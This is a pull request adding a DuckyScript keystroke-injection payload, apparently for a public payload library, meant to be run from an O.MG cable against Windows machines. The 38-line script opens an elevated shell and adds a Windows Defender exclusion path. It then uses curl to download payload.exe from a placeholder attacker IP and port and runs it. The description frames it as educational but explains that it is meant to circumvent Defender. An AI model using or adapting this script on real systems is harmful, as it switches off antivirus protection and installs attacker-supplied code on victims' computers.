### PR TITLE
Create Violate-Defender

### DIFF
--- a/payloads/library/remote_access/Violate-Defender
+++ b/payloads/library/remote_access/Violate-Defender
@@ -1,0 +1,38 @@
+DUCKY_LANG US
+DELAY 2000
+GUI r 
+STRING cmd
+DELAY 300
+CTRL+SHIFT ENTER
+DELAY 300
+TAB
+DELAY 200
+TAB 
+DELAY 200
+TAB 
+ENTER
+DELAY 200
+STRING powershell
+DELAY 500
+ENTER
+STRING mkdir C:\<created folder of your choice> ### change me ###
+DELAY 100
+ENTER
+STRING Add-MpPreference -ExclusionPath 'C:\folder of your choice' ### change me ###
+ENTER
+DELAY 500
+STRING curl http://<---IP---->:<PORT>/payload.exe -o C:\folder_of_choice\created_payload.exe ### change me ###
+ENTER
+DELAY 500
+STRING cd C:\<created folder> 
+ENTER
+DELAY 200
+STRING .\payload.exe ### change to desired, compiled payload ###
+ENTER
+DELAY 1000
+STRING exit
+ENTER
+DELAY 100
+STRING exit
+DELAY 100
+ENTER


### PR DESCRIPTION
### FOR EDUCATIONAL PURPOSES ONLY ####  
This is a simple DuckyScript that has been tested on the O.MG cable. it is designed to create a rule expection to a folder usering powershell to circumvent Windows Defender. this may only work if the user/target in quesiton has elevated rights to run a cmd/powershell prompt as Administrator. the script will use the curl command and download a file from your attacker machine and place it into a  created folder of your choice while applying the execption to that folder.